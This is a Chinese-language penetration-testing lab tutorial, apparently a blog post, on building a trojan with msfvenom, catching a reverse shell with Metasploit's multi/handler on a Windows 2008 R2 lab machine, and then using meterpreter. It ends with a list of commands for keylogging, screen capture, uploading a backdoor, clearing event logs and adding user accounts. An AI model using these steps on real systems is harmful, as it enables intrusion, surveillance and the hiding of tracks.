原理:
利用msf子產品中的msfvenom子產品,生成123.exe木馬檔案,用靶機打開,攻擊成功後,就滲透到了靶機系統中。
準備:
靶機:windows 2008 r2
ip:192.168.100.20
攻擊主機:kali
ip:192.168.100.21
實戰:
1、 檢視攻擊主機ip
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLicmbw5SO5YTN2MGO0MmYxM2NyMmMiNTYldzYwkjZkBjZ1UGN48CX0JXZ252bj91Ztl2Lc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
2、 生成123.exe木馬檔案
3、 将制作好的木馬檔案放到目标機内
4、 啟動msfconsole進入msf
5、 加載exploit/multi/handler,設定payload反彈,設定LHOS反彈位址
6、 show options檢視所設定的内容
7、 設定好後,直接exploit,開始攻擊,等待目标靶機中招
8、 當靶機中招後,獲得反彈shell,滲透成功
9、 此時我們就可以對靶機進行操作了
10、 如果出現了亂碼現象,這是編碼的問題,在終端->修改編碼->改成中文的GBK退出再次shell即可解決
11、 meterpreter下的部分指令總結:
getwd目前目錄
dir檢視所有檔案
cat111.txt 檢視檔案111.txt内容
search-f cmd.exe (搜尋名為123.exe檔案所在目錄)
upload/root/桌面/backldoor.exe(要上傳的檔案) -> c:\(上傳到的目錄) 上傳檔案
downloadc:\123txt /root 下載下傳檔案
clearev清除日志
getuid目前使用者
ps 檢視所用程序
sysinfo系統資訊
keyscan_start開始鍵盤記錄
keyscan_stop停止鍵盤記錄
keyscan_dump檢視結果
螢幕截圖
screenshot
螢幕監控
runvnc
shell
擷取shell,進入cmd
netuser 使用者名 密碼 /add 添加使用者(jeff/Abc!23)
netuser 使用者名 密碼 更改使用者密碼(jeff/[email protected])
最後,本次實驗僅是僅供實驗,切勿用于實戰,否則後果自負!